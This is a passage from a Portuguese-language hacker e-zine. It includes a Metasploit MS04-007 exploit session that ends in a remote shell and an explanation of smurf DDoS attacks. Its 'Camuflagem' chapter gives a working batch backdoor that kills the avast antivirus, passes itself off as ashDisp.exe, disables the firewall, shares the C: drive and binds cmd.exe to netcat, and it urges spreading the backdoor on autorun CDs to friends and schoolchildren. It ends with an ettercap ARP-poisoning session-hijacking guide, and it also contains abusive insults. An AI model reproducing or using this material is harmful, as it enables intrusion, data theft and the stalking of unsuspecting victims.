win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
.............. Para setar o payload, alvo, porta, protocolo e lançar o exploit, digite:
msf msasn1_ms04_007_killbill >setg PAYLOAD win32_bind
PAYLOAD -> win32_bind //PAYLOAD setado
msf msasn1_ms04_007_killbill(win32_bind) > setg RHOST 192.168.1.16
RHOST -> 192.168.1.16 //Alvo setado
msf msasn1_ms04_007_killbill(win32_bind)setg RPORT 445
RPORT -> 445 //Porta setada
msf msasn1_ms04_007_killbill(win32_bind) >setg PROTO smb
PROTO -> smb //Protocolo setado
msf msasn1_ms04_007_killbill(win32_bind) >exploit //Lança o exploit
[*]Starting Bind Handler.
[*]Attempting to exploit target Windows 2000 SP2-SP4 + Windows XP SP0-SP1
[*]Got connection from 192.168.139.1:32794 <_> 192.168.139.16:4444
Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Shell obtido com sucesso. Isso prova que o metasploit é uma das melhores ferramentas para se testar a segurança de sua rede hoje, vale muito você gastar um tempinho mechendo nele, eu recomendo.
Links para download
Framework 3.0 Windows --------> http://framework.metasploit.com/msf/downloader/framework-3.0.exe
Framework 3.0 Unix --------> http://framework.metasploit.com/msf/downloader/framework-3.0.tar.gz
Framework 2.7 Windows --------> http://metasploit.com/tools/framework-2.7.exe
Framework 2.7 Windows --------> http://metasploit.com/tools/framework-2.7.tar.gz
Para obter informações com relação aos alvos do exploit (depois que o mesmo for setado):
msf msasn1_ms04_007_killbill > show TARGETS
Supported Exploit Targets
=========================
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
Para obter mais informações sobre a falha:
msf msasn1_ms04_007_killbill > info msasn1_ms04_007_killbill
Name: Microsoft ASN.1 Library Bitstring Heap Overflow
Class: remote
Version: $Rev: 3818 $
Target OS: win32, win2000, winxp
Keywords: asn1
Privileged: Yes
Disclosure: Feb 10 2004
Provided By:
Solar Eclipse <solareclipse [at] phreedom.org> [GPLv2 License]
Available Targets:
Windows 2000 SP2-SP4 + Windows XP SP0-SP1
Available Options:
Exploit: Name Default Description
-------- ------ ------- ---------------------------
optional SSL The target service uses SSL
required RHOST The target address
required RPORT 445 The target service port
required PROTO smb Protocol (smb or http)
Payload Information:
Space: 1024
Avoid: 0 characters
| Keys: noconn tunnel bind ws2ord reverse
Nop Information:
SaveRegs: esp ebp
| Keys:
Encoder Information:
| Keys:
Description:
This is an exploit for a previously undisclosed vulnerability in
the bit string decoding code in the Microsoft ASN.1 library. This
vulnerability is not related to the bit string vulnerability
described in eEye advisory AD20040210-2. Both vulnerabilities were
fixed in the MS04-007 patch.
You are only allowed one attempt with this vulnerability. If the
payload fails to execute, the LSASS system service will crash and
the target system will automatically reboot itself in 60 seconds.
If the payload succeeeds, the system will no longer be able to
process authentication requests, denying all attempts to login
through SMB or at the console. A reboot is required to restore
proper functioning of an exploited system.
References:
http://www.osvdb.org/3902
http://www.phreedom.org/solar/exploits/msasn1-bitstring/
http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0818
http://www.milw0rm.com/metasploit/40
----- C4p1Tul0 10
//--//--//--//--//--//--// //--//--//--//--//--//--//
||============#||Entendendo o smurf ||#==============#||
O meu ultimo topico no darkers
6_BL4CK9_F0X6
//--//--//--//--//--//--// //--//--//--//--//--//--//
Quando o atacante faz um ataque do tipo smurf, sua estaçao irá emitir pacotes UDP, mais necessariamente pacotes ICMP echo request para toda a "rede alvo" usando um tipo de transmissão de dados chamada de broadcast, esse tipo de transmissão emiti pacotes de dados para toda a rede, nesse caso serão enviados pacotes ICMP echo request para os endereços de broadcast da rede que existem computadores que serão usados como piões para o ataque, este IP normalmente é o X.X.X.255, quando os piões recebem o pacote ICMP echo request imediatamente ele retornam pacotes ICMP echo reply ou melhor dizendo: retornam pings. Já que fiz um broadcast para mandar pacotes de requisição para os host piões, então todos iram mandar pacotes ICMP echo reply quase simultaneamente, mas só que ao invés de mandar os pacotes de resposta para o atacante (que lançou o broadcast), os dados vão ser enviados para o computador da vítima usando uma técnica chamada IP spoofing para fazer os piões acreditarem que quem fez a solicitação foi a vítima, assim fazendo com que o computador alvo do ataque receba muitos pacotes ICMP echo reply como resposta de uma solicitação que não fez, conseqüentemente não conseguindo processar todos os dados recebidos ocasionando o travamento do alvo. Existem muitos programas ótimos para realizar o smurf, os melhores são o WinSmurf e o Smurf2k.
http://www.hunterhacker.xpg.com.br/smurf1.jpg
Para se proteger desse ataque basta configurar seu firewall para nao responder a solicitaçao de eco de entrada e pronto, pois este ataque se aproveita do envio de ICMP echo request.
Hoje eu estou feliz, ri muito porque um panaca la do forum do darkers disse que IPspoof so funciona em rede interna huahauhHuahUh!!! Trouxa!!!! Seu lammer nojento, espero que seu corpo queime eternamento no fogo do inferno, seu rato podre, escoria da sociedade, vai varrer o site do banco do brasil com o languard HuahUhauH Lammer!!! Tu consegue ate fazer bruteforce no FTP do banco do brasil se usar o X-Scan-v3.3, tu pode varrer todas as portas tranquilamente, tenta ae hUhauh, tenta quebrar o VNC do banco, vai correndo rato. Sua raça imunda acaba de ler uma coisa e mesmo sem saber o que vai fazer vai logo varrendo hosts, sem contar que mesmo sem saber da coisa ficam discutindo com quem entende dizendo besteira nos foruns. Seu filho da puta tosco, macaco imundo. Olhem a rata que esse vermezinho chamado Mateus deu la no meu topico Smurf.
Porque eu odeio esse lammer:
Parece estranho mesmo eu escrever sobre um lammer na minha zine, mas minha indignaçao foi porque esse mesmo lammer de tanto falar besteira fez despertar o meu chacra interior de raiva e eu comecei a menospreza-lo, esse mesmo idiota fez eu ser banido do forum do darkers, digamos que foi a gota dagua para o cuzao do reeves.
----- C4p1Tul0 11
//--//--//--//--//--//--// MEXT //--//--//--//--//--//--//
||============#||THE KING OF CALCULATORS||#==============#||
6_BL4CK9_F0X6
//--//--//--//--//--//--// MEXT //--//--//--//--//--//--//
Reparem bem que na maioria dos forums tem sempre um cara que posta uma calculadora uhauihauiahiau, e foda mesmo, os caras lascam tudo, nao vou mentir que quando comecei a mecher com C, comecei por uma calc, mas depois prometi para mim mesmo:
Primeira aplicaçao............Nunca mais sera uma calculadora
Uhauahgayg Meu primeiro code em perl foi um cadastrador de clientes, muito maneiro, mas para quem gosta de se basear ae pelas calcs vou sempre tar postando fonts de calcs ae pra galera ter como exemplo de code, tu veras calcs em varias linguagen, tais como, C, perl, Javascript e tals.
Aviso para o curso de batch que ta vindo ae
Como eu sempre arrumo um tempinho aqui resolvi fazer ae pra voces um calculadorazinha bastante simples, apenas para servir como base para aqueles que estao começando a programar em batch, daqui uns dias vou ta postando ae um curso mais que completo de programaçao em batch. Voce simplesmente ficara impressionado em saber o que um simples batch e capaz de fazer ehhe (diabinho), ja fiz um programa de bruteforce que exibe a senha do maluco, mapeia a unidade dele e faz muitas outras piruetas loucas. Atualmente desenvolvo em batch anti worms e malwares, que quando entram no sistema começam a levantar informaçoes sobre tudo da vitima e salva tudo em uma pasta recem criada na pendrive, ou seja, voce coloca a pendrive na USB com meu malware em autorun por 30 segundos no maximo, dae voce consegue informaçoes de ate 6 meses sobre a vitima eheheh Bendito seja o santo batch, faço coisas incriveis com arquivos em lote pessoal (como voces vao ver no capitulo backdoor camuflagem) e voces tambem vao aprender, so pesso que Aguardem....
@echo off
title Calculadora simples v0.1 by 6_Bl4ck9_f0x6
:principal
cls
Echo Calculadora simples v0.1 by 6_Bl4ck9_f0x6
color a
echo. & echo.
echo Somar = 1
echo Dividir = 2
echo Subtrair = 3
echo Multiplicar = 4
echo Calcular Cubo = 5
echo. & set /p choice=Digite um numero [Para setar o operador]:
if %choice% EQU 1 (goto Somar)
if %choice% == 2 (goto Dividir)
if %choice% EQU 3 (goto Subtrair)
if %choice% == 4 (goto Multiplicar)
if %choice% EQU 5 (goto Cube)
IF %ERRORLEVEL% GEQ 6 goto Ops
IF %ERRORLEVEL% LSS 1 goto Ops
:Somar
cls
echo Este e o seu operador: +
echo. & set /p numero=Digite o primeiro numero:
set /p numeroD=Digite o segundo numero:
set /a somar=%numero% + %numeroD%
echo. & echo %numero% + %numeroD% = %somar% & echo.
pause & goto principal
:Dividir
cls
echo Este e o seu operador: /
echo. & set /p numero=Digite o primeiro numero:
set /p numeroD=Digite o segundo numero:
set /a multiplicar=%numero% / %numeroD%
echo. & echo %numero% / %numeroD% = %multiplicar% & echo.
pause & goto principal
:Subtrair
cls
echo Este e o seu operador: -
echo. & set /p numero=Digite o primeiro numero:
set /p numeroD=Digite o segundo numero:
set /a subtrair=%numero% - %numeroD%
echo. & echo %numero% - %numeroD% = %subtrair% & echo.
pause & goto principal
:Multiplicar
cls
echo Este e o seu operador: *
echo. & set /p numero=Digite o primeiro numero:
set /p numeroD=Digite o segundo numero:
set /a multiplicar=%numero% * %numeroD%
echo. & echo %numero% * %numeroD% = %multiplicar% & echo.
pause & goto principal
:Cube
cls
echo Calculo de cubo & echo.
set /p numero=Digite o primeiro numero:
set /p numeroD=Digite outro numero:
set /p other=Agora o ultimo numero:
set /a calculoC=%numero% + %numeroD% + %other%
echo. & echo %numero% + %numeroD% + %other% = %calculoC% & echo. & pause
goto principal
:ops
cls
echo.
echo EI CARA OPERADOR INVALIDO
echo.
echo Para continuar pressione qualquer tecla... & pause > nul
goto principal
----- C4p1Tul0 12
[Texto escrito por mim originalmente para a porra do darkers]
|=--------------------=[BackDoor Camuflagem]=----------------------------=|
|=------------------------||for avast! antivirus||--------------------------------=|
| -+ BY +- |
|=--------------=[6_Bl4ck9_f0x6 <b-fox@bol.com.br>]=-------------------=|
(Minha ideia recente)
Ei, ei, ei, feliz natal, ops, ho! ho! ho!... é um negocio assim...?...Bah! Deixa pra lá, ei galera alguém pode me dizer se os Hackas comemoram o natal? Putz, ninguém ta festejando por aqui, chamei os caras, mas preferem ficar na frente do samsung se bronzeando, deixa queto e vamos logo falar de uma nova coisinha interesante que pensei aqui, vamos a historia de hoje:
Era uma vez um garoto que queria injetar um backdoor baseado no netcat (por ser indetect) em um sistema de um amigo que num tava querendo lhe dar (gratuitamente) os videos do pride (é esse mesmo que voce ta pensando, lutas e tals, "finado" ryan grace) para o mesmo dar uma olhada na pancadaria em pleno natal, dae o que foi que esse rapaz fez? Abriu o portão de casa (sem camisa ainda), com o seu velho cigarrinho na boca e uma imensa cara de pau, discaramente ele bateu na porta do vizinho e quando o mesmo apareceu ele falo:
- Feliz natal vizinho, trouxe uns videos de sacanagem para voce assistir cara.
Deu um presente de natal para esse amigo. Era um DVD recheado de filmes de sacanagem devidamente comprimidos com o KGB (ou seja, muitos) e um trojan hauahuha!!!
Mas eu tinha que fazer bem feito né galera, pois o cara (confiando muito nos amigos) todo santo dia olha o registro para ver se tinha algo suspeito se iniciando (traumatizado com o pessoal), putz (pensei), dae complica. Antes de ir bater no portão da casa dele pensei, pensei, pensei, e pensei. Nessa brincadeira passei 10 minutos, entre cigarros e Final Fantasy IX hauhauha!!! derrepente....Tchanram!!!
Bingo!!! pensem comigo:
O cara todos os dias olha lá no msconfig e ve sempre a mesma coisa:
Item de inicialização | Comando | Local
ashdisp.exe Path do ashdisp.exe HKLM\Software\Microsoft\windows\currentversion\run
Ou seja, o cara sempre via o componente do avast, sacou? Então o que temos que fazer é transformar o nosso backdoor no avast. Como?
Assim:
REM Compile este font com o nome Camuflagem.exe
REM Certifiquese de que a unidade Master da vitima é a C: mesmo,
REM se não souber use a variavel de amgiente %PROGRAMFILES%
taskkill /f /im ashDisp.exe
cls
taskkill /f /im ashMaiSv.exe
cls
taskkill /f /im ashServ.exe
cls
taskkill /f /im ashWebSv.exe
cls
taskkill /f /im aswUpdSv.exe
cls
copy Camuflagem.exe "C:\Arquivos de programas\Alwil Software\Avast4"
reg delete HKLM\Software\Microsoft\windows\currentversion\run /v avast! /f
del "C:\Arquivos de programas\Alwil Software\Avast4\ashDisp.exe
rename "C:\Arquivos de programas\Alwil Software\Avast4\Camuflagem.exe" ashDisp.exe
reg add HKLM\Software\Microsoft\windows\currentversion\run /v avast! /t REG_SZ /d "C:\Arquivos de programas\Alwil Software\Avast4\ashDisp.exe"
Copy D:\netcat\*.* %systemroot%\system32
net stop sharedaccess
net share c=c:\
net start telnet ---- > Se tiver suporte (obvio)
nc -L -vv -p 12345 -e cmd.exe
Cria ae um autorun e compilar os codigos em batch ae em cima e complementa o CD com algumas paradas que a vitima goste, assim ela ficará tão impressionada com o presente que nem se quer vai pensar que tem um trojan no CD, tipo cara:
O meu amigo é fisurado em muié, dae intupi um DVD de sacanagem e dei, o cara mesmo que soubesse que tinha trojan num ia ta nem ae Huahuahauh!!!!
Este é um Backdoor bastante interesante se tratando da sua indetectabilidade em alguns casos, essa palavra existe? Que se foda eu não quero nem saber, vou descrever as suas funções e escrever um pequeno manual do usuario para voces seguirem, vamos lá. Primeiramente eu gostaria de dedicar esse backdoor a minha amada Gracinha por ela sempre limpar as cinzas de cigarro que insistem em cair no meu quarto por causa dos idiotas cegos que frequentam a minha casa e chutão a droga do cinzeiro huahauhau!!!!. Camuflagem é feito para o avast! Antivirus mas pode ser adptado tranquilamente para qualquer outro antvírus ou programa que se inicie na maquina. vou dar exemplo do que estes simples codigos acima são capazes de fazer apenas compilados colocados em um CD e evidentemente colocados no drive da vitima.
A rota
A rota que o Camuflagem segue é a seguinte:
No momento que o cd que esta infectado com o Camuflagem entrar no drive da vitima ele matará o antvírus (pra ele num piar) se copiará para o diretorio padrão do avast e lá ele vai deletar a chave de registro do ashdisp.exe, que é um componente do avast que cria uma chave no registro para se inicializar na maquina, este componente possui um valor sequêncial de nome avast!. Logo em seguida ele deletará o ashdisp.exe e se renomeará com o nome ashdisp.exe e criará outra chave no registro com o mesmo nome do valor da chave deletada para inicialo toda vez que a vitima se logar na maquina, copiará os componentes do netcat que esta no cd para o diretorio do sistema, matará o firewall do windows (pra ele também num piar), compartilhará a unidade c: do cara (meu vizinho ta no mesmo ISP que eu hauhauha), abrirá a porta telnet do PC dele, e vai abrir a porta 12345 com o netcat (homenagem ao netbus), ufa!!!. Assim quem for no msconfig vai ver o seguinte:
Item de inicialização | Comando | Local
ashdisp.exe Path do ashdisp.exe HKLM\Software\Microsoft\windows\currentversion\run
Eita bichim pra se esconder huahauhau!!!! Alguém ae diz que isso ae em cima é um trojan?
Aplicação Fantasma
A vitima não desconfiará que o avast é na verdade um trojan camuflado. Mas infelizmente ele não esta perfeito falta alguns retoques, tenha em mãos um compilador de batch chamado Quick Batch File Compiler estou usando o versão 2.1.5.0, esta ferramenta será bastante util pois se a vitima utilizar algum software que exibe os icones dos itens de inicialização da maquina ele será facilmente detectado, pois nosso Backdoor não tem um icone por enquanto, por isso e por mais alguns motivos que utilizaremos o Quick Batch File Compiler.
Importe o seu Batch com o codigo fonte acima para o Quick Batch em open (obvio), logo depois va em Project > Options. Na guia General marque a caixa de texto Ghost Application ou Aplicação fantasma, se a sua versão for em inglês (eu acho que só tem em inglês) aqui vai uma tradução:
This type application will not create any windows.
May be useful for 'Silent' installation.
Este tipo de aplicação não ira criar nenhuna janela.
Talvez seja util para uma instalação silenciosa.
Huhuhuhuhu!!! UiUiUI hauahuha, "sem console". Então isso significa que nos podemos rodar em modo oculto sem aquele console troncho do DOS dizendo que o netcat esta escutando em uma porta, de um OK, agora vá na guia Custom Resources > Application Icon e importe o icone do ashdisp.exe original, calma, calma, eu vou ensinar como se obter qualquer icone de qualquer executavel mas para isso voce precisa da nossa ultima ferramenta de trabalho, o programa se chama Resource Hacker pode ser encontrado em:
http://www.hunterhacker.xpg.com.br/15.rar
Com esse programa podemos decompilar e recompilar um executavel com os codigos auterados, para esse ato se da o nome de engenharia reversa, mas nesse caso vamos pegar apenas o icone (por hora). Com o programa em mãos abra-o (dã) e importe o arquivo executavel que deseja obter o ícone, no caso é o ashdisp.exe. Ja dentro do programa vá na mini-pasta onde está escrito icon e explore a mesma até encontar as imagens de icones, dai e só clicar com o botão direito e salvar o ícone. Com o ícone ja salvo agora importe-o com o Quick Batch e compile o seu Arquivo em lotes (F9) com o ícone do ashdisp.exe, depois de salva-lo com o ícone do ashdisp.exe estamos eliminando a possibilidade de indentificação por visualizadores de processos que exibem os ícones dos itens de inicialização, mas e se por acaso este mesmo identificador de processos (como process view por exemplo) além de exibir o icone exibir também as propriedades dos itens no startup? Eheheeh, vamos roubar também as propriedades do ashdisp.
Roubando as propriedades do ashdisp.exe
Link ae:
http://www.hunterhacker.xpg.com.br/propriedades.txt
Importe este script de propriedade para o camuflagem com o reshacker e cole na mini pasta correspondente as propriedades do aplicativo, depois clique em compile script para compilar estes scripts no camuflagem, prontinho, já temos o nosso clone, agora crie um CD em autorun com o seguinte nome na parte de cima do CD:
A virgem da minha vizinha transando com minha prima parte 1 de 66. Esqueça este CD na casa de algum amigo seu que você tem o IP e todos os messes deixe uma continuação hauhauah!!! pronto, vá pra sua casa e se conecte no PC dele enquanto o tarado ver a suposta prima de alguém trepando com outra mulher (arrume um filme caseiro pra ficar mais convincente, eheh), assim enquanto ele olha o filme você está roubando os arquivo dele acessando algum servidor de FTP por telnet no PC dele e jogando (put) os arquivos dele pro seu servidor.
Pense bem com relação a esssa historia de autorun:
K2ps ------- > TJ de informação, manda tudinho pro POP bastando configurar previamente o SMTP. Esqueça um monte de CDs com joguinhos em frente a uma escola de pirralhos "cheios da grana", derrepente voce terá os logs dos pais deles hauhauhauh!!! Experiencia propria HUahuahuah!!!! Huhuhuhuhuhuhuh. Putz, só foi eu terminar de escrever o pessoal já chegou, até os hackas comemoram o natal uhauah!!! Falow mein freuds, até a proxima....
SHOTS:
Procurem na porra do darkers
----- C4p1Tul0 13
//--//--//--//--//--//--// Zx|zZ //--//--//--//--//--//--//
||==============#|| Humor Hacker ||#==============#||
||==============#|| RIPADO DA ZINE F3||#==============#||
//--//--//--//--//--//--// Zx|zZ //--//--//--//--//--//--//
_xXXXP^'' ``^YXXXx_
_xXXXXP~ 14 - Entrevista - ~YXXXXx_
_xXXXXXX( Cheat Struck )XXXXXXx_
xXXXXXXXXXXbxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdXXXXXXXXXXx
YXXXXXXXXXXP^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^YXXXXXXXXXXP
~YXXXXXX( )XXXXXXP~
~YXXXXb_ Cheat Struck _dXXXXP~
~YXXXbx.. ..xdXXXP~
Struck: Finalmente conseguimos contato com essa ilustre figura do
hacking brasileiro: Cheat Struck.
Ola.
Struck: Alou.
Struck: Como voce se sente?
Struck: Meio nervoso. Nunca fui entrevistado antes.
Struck: Entao para quebrar o nervosismo posso comecar com uma pergunta
pessoal??
Struck: Hmmm.. ok
Struck: Voce tem namorada??
Struck: nao.
Struck: Como que pode um bunitao como voce nao ter namorada?
Struck: Ora essa. Voce que eh lindo.
Struck: Obrigado. Mas acho que nao eh isso que nossos leitores pretendem
saber nesta entrevista.
Struck: Espero que nao, afinal 99% dos leitores da f3 sao homens.
Struck: Realmente.
Struck: ...
Struck: ...
Struck: hm...
Struck: ;)
Struck: =*
Struck: Diga algo que nossos leitores possam se interessar.
Struck: Sei la. Que tal computadores??
Struck: Boa. Conte-nos como foi sua primeira relacao com um computador.
Struck: Bem... cof! cof! Achu que isso eh meio pessoal.
Struck: Voce ja gozou no teclado?
Struck: Nao. Eu costumo usar a mao como escudo.
Struck: Hm... interessante.
Struck: Eh preciso ter reflexos rapidos.
Struck: Voce tem algum super poder??
Struck: Eu posso fazer o monitor ficar preto apenas olhando para ele
por alguns minutos.
Struck: Puxa vida! Aposto que vc nunca precisou usar screem savers.
Struck: Hmm... eh verdade. Talvez isso acontecao por causa dos screem
savers. Nunca havia pensado nisso.
Struck: Entao fora isso, o que voce sabe fazer??
Struck: Eu sei fazer ezines.
Struck: O que eh isso?
Struck: Eh um monte de textos que eu escrevo sobre coisas inuteis que
nunca precisaremos usar na vida real.
Struck: E as pessoas leem isso?
Struck: Por incrivel que pareca.
Struck: Fale-nos mais sobre estas ezines.
Struck: Atualmente eu escrevo a fatal3rror. Ja escrevi a cszine, alem
de materias para a DeathKnights, s13, entre outras.
Struck: E te pagam para escrever estas materias?
Struck: Nao.
Struck: Entao pq voce as escreve?
Struck: Porque eu sou troxa.
Struck: Serio.
Struck: Sei la! Falta do que fazer, hobbie, for fun,... Sei la.
Struck: Qual seu objetivo com estes textos??
Struck: Primeiramente, aprender mais. Pq assim como no colegio, qdo
voce faz um trabalho, pesquiza mais sobre o assunto e assim
aprende mais.
Struck: e os outros objetivos??
Struck: Ah sim!!
Fama, gloria pessoal e status na sociedade.
Struck: Como surgiu a ideia de escrever uma zine?
Struck: A fatal3rror surgiu do nada. Uma noite eu comecei a juntar os
textos q tinha comecado a fazer e nao acabei. Dei uma relida,
conclui-os e juntei tudo num txt soh. Joguei na inet e as
pessoas comecaram a ler...
Struck: E qto a cszine??
Struck: Nakela epoca eu catava tudo qto era textos sobre h/p/c/s/v e
escrevia sobre o que havia aprendido.
No final da semana colocava na page para amigos que tb estavam
comecando, lerem...
Struck: E pq ela acabou??
Struck: Pq comecou a fazer sucesso. Ae rolava pressao pra zine sair a
tempo, essas coisas. Nao curtia isso, entao cabei com a zine.
Struck: Depois disso o que voce fez??
Struck: Entrei na dk.
Struck: e...
Struck: Foi isso.
Struck: O que voce fazia na deathkinghts??
Struck: Eu escrevia para a zine deles, e qdo precisava, ajudava o grupo
ou os membros a ownar algumas maquinas.
Struck: E saiu pq??
Struck: Deu uns rolo com a bl0w. Eu conhecia o pessoal dos 2 lados
entao pra nao sobrar pra mim, sai.
Struck: Voce foi membro da bl0w??
Struck: Nop. Apenas frequentava o canal restrito aos membros, mas nunca
fui convidado a ser membro. E se fosse, nao aceitaria, afinal
na epoca eu era da dk.
Struck: Voce faz defaces??
Struck: Ja fiz. Na epoca da dk.
Struck: Quais eram os motivos?
Struck: Diversos. Cada membro tinha seus proprios motivos. O grupo deixava
bem claro que nao se responsabilizava pelo ato de seus membros.
Struck: E quais eram os seus motivos??
Struck: Eu ia de gaiato. Ajudava os outros. Unica vez que fiz deface por
motivos proprios, foi qdo o Cacaio tava com problemas com a
policia. Ae eu e o encrypt fizemo um Mass Hack em mais de 100
paginas com o protesto.
Struck: E vc ainda faz defaces??
Struck: Nao.
Struck: Pq??
Struck: Nunca vi graca em alterar paginas sem proposito nenhum. Se um
dia eu precisar ser ouvido eu talvez volte a fazer defaces. Mas
provavelmente isso nao aconteca pq agora se precisar falar alguma
coisa, tenho a f3 para isso.
Struck: Depois que saiu da dk o que houve??
Struck: Foi +/- a epoca que comecei a beber feito um gamba.
Talvez por isso nao lembre direito o que aconteceu nessa epoca.
Struck: Porra! Voce recebeu convites de outros grupos!
Struck: Ah eh!! Obrigado por lembrar. Embora eu nao tenha entrado em
nenhum realmente.
Struck: Ja sao 4:30 da madrugada no horario de verao. Acho que podemos
acabar com essa entrevista nao eh??
Struck: Achu q ninguem se importaria se isso acontece-se.
Struck: Sera que tem gente que leu essa reportagem ateh aki??
Struck: Provavelmente nao. Nem eu mesmo estou lendo o que escrevo pra
nao ter desgosto.
Struck: Entao ta. Obrigado por seu tempo.
Struck: Meu tempo eh todo seu.
Struck: Realmente...
Struck: Se liga que amanha temos prova.
Struck: Eh mesmo. Vou dormir. Boa noite.
Struck: Falow!!
----- C4p1Tul0 14
[+ ======X============X===============X===== +] XxX
CONFIGURANDO O ETTERCAP EM MODO SHELL
||=================#|| E |#=================||
HIJACKING DE HTTP
+ bY +
6_Bl4ck9_f0x6
[+ ======X============X===============X===== +]
Ola pessoal, olha eu aqui outra vez, eu tenho que parar de escrever e começar aprender, mas num da, to meio viciado em escrever ehehehe, mas acredito que voces nao querem saber disso. Pois bem, agora vou demonstrar a principal tecnica utilizada por mim e que pode ser muito util algum dia para voces, o sequestro de seçao de HTTP, tambem vou falar do sequestro de telnet apenas como complemento (em um capilo futuro), na pratica nunca usei Hijacking de telnet contra alguem, primeiro porque em telnet num rola a cripto e existe uma possibilidade muito remota de uma empresa utilizar este serviço e segundo e porque usuario comuns (a escoria da sociedade) nao sabe nem o que e telnet Huahauh!!!. Vamos la, acredito que voce ja tao de saco cheio de ouvir teoria sobre Hijacking, minha intençao aqui nao e encher voces com mais teoria, vamos a uma receitinha de bolo, ou seja, vamos partir para a açao, porque ninguem vive de teoria. Voce precisará carregar na pendrive dois programas, o primeiro e o ettercap para redirecionar o trafego dos computadores caso voce nao esteje no gateway, o que pode ser muito provavel caso voce seguiu a vitima e ela esteje em uma lan house que seja de pessoas desconhecidas, voce nao vai chegar no dono da lan e dizer:
- Ei, licença, eu poderia usar esse computador para capturar os pacotes daquele computador que aquela senhorita está usando? Huahuahauh!!!!
-Isso é bem melhor para voce cara, vai por mim, pois se eu nao usar esse computador vou precisar recorrer ao arp poisoning e isso é um perigo muito grande porque pode acontecer o tal ACK Storm quando eu atacar, pois nao tenho tempo de usar syn flood. Hauhauhauahuahuahauh!!!!
O cara vai franzir a testa e olhar pra voce com uma interrogaçao na cabeça, tipo os mangás e dizer:
- Seja la o que for isso a reposta é Nao!!!! kkkkkkk
Dae voce tem que pegar o trafego na marra, por isso voce precisa do ettercap, pois voce vai utilizar arp poisoning, coisa que ja ta todo mundo enjoado de ouvir falar. O segundo programa é o Spynet que pode ser encontrado no:
http://www.elhacker.net/ ------ >>> O site que eu mais amo na vida, me ajudou muito no meu começo :- )
ou
http://www.hunterhacker.xpg.com.br/21.rar
O nome Spynet na verdade é apenas o nome do pacote, pois depois de sua instalaçao voce tera dois programas na maquina, que sao o CaptureNet que é um bom sniffer e o PeepNet, montador de cookies que usa os dados capturados pelo CaptureNet para sequestrar a seção, ou seja, ele remotando o cookie da galera.
Vamos começar pelo ettercap.
Vou demonstrar exemplos de linha de comando, porque GUI nao e bom para o seu aprendizado, por que se voce aprender a lidar com linha de comando no ettercap voce poderá aproveitar muito mais esta ferramenta, pois voce podera utilizalo usando o telnet para sniffar pacotes das estaçoes na rede do computador invadido, coisa que nao seria possivel de ser feita (pelo menos nao sem levantar suspeitas) usando algum programa de assistencia remota como o VNC, mas obvio que isso não é regra, pois voce pode injetar a dll do VNC no host sem levantar suspeitas exploitando uma falha no mesmo e começar a mecher nele graficamente, para isso utilize o metasploit. Mas vamos nos focalizar no ettercap via command line. Julgando que você tem que ser rapido no seu sequestro, pois a vitima pode apenas querer dar uma olhada no seu orkut e logo sair, vamos continuar este texto. Bem, ja que voce tem que ser rapido em utilizar as ferramentas, entao use uma variavel de ambiente logo de cara no executar para abrir o shell do ettercap, ao inves de chutar uma unidade master de um computador que voce nunca viu e evitar aquele pã do windows ehehe, ou seja, abra o shell dessa maneira:
cmd /k cd %ProgramFiles%\EttercapNG\
Para ver as variaveis de ambientes digite o comando set sem parametros. Se a lan utilizar aqueles gerenciadores que bloqueiam o executar, abra qualquer diretorio e faça uma pesquisa no sistema pelo interpretador (cmd.exe) na pasta do sistema (\windows\system32\) porque pesquisas normalmente nao sao bloqueadas. Execute ele e faça o mesmo esquema usando variaveis de ambiente para entrar no diretorio do ettercap, mas tira o cmd /k porque se nao voce vai criar um subshell, mas num tem nada, so falei para você saber (dã, todo mundo sabe disso).
No diretorio do ettercap digite a opçao -I maiusculo que significa interface, para ele exibir as interfaces de rede disponiveis, voce verá algo mais ou menos pareceido com isso:
List of available Network Interfaces: //Lista de interfaces de rede disponiveis
\Device\NPF_GenericDialupAdapter Adapter for generic dialup and VPN captu re
\Device\NPF_{0C95D153-9A2E-4593-95EF-9DC9C299E0C6} VMware Virtual Ethernet Adapter
\Device\NPF_{2C102038-8912-4C6D-B516-7BA2DD3B86DE} VMware Virtual Ethernet Adapter
\Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} VIA PCI 10/100Mb Fast Ethernet Adapter
Selecione a interface de rede que condiz com o mesmo seguimento de rede que a vitima está. Para setar uma interface de rede utilize a opçao -i minusculo que tambem significa interface, tipo assim:
ettercap -i \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED}
Essa é a minha interface eth0, dã (10/100Mb). Logo a seleçao da interface de rede vamos setar a interface de usuario, ou seja, como o usuario vai ver as coisas acontecendo, nada de GTK pessoal, vamos usar a interface de texto mesmo e vamos utilizar a opçao q minusculo que é usada para farejamento de trafego, com essa opçao apenas pegamos coisas importantes, como senhas, caso contrario voce ia ver muito lixo na tela. Ja a opçao -Q maiusculo nao nos mostra nada.
Deixe assim:
ettercap -i \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} -Tq
Agora vamos dizer para o ettercap qual o tipo de redirecionamento que iremos utilizar, nesse caso utilizaremos o arp poisoning. Para setar o redirecionamento use a opçao -M que vem de Man In The Middle. Agora voce me pergunta:
Mas temos que escrever Arp poisoning? A resposta e nao, basta digitar arp, devera ficar assim:
ettercap -i \Device\NPF_{B2BD91AC-23DB-4E22-8802-B6DBE12229ED} -Tq -M arp
Agora vamos usar a opçao -o "only" que significa apenas, vamos utilizar o -o porque queremos apenas fazer o redirecionamento de trafego, porque quem vai fareja é o peepnet. Mas se quisermos pegar senhas do pessoal na rede nao colocamos o -o. O ettercap pega senhas de muuuuitos protocolos, pega senhas de negociaçoes SSL (banco) atraves de MITM, pega senhas de VNC, entre outros, tais como:
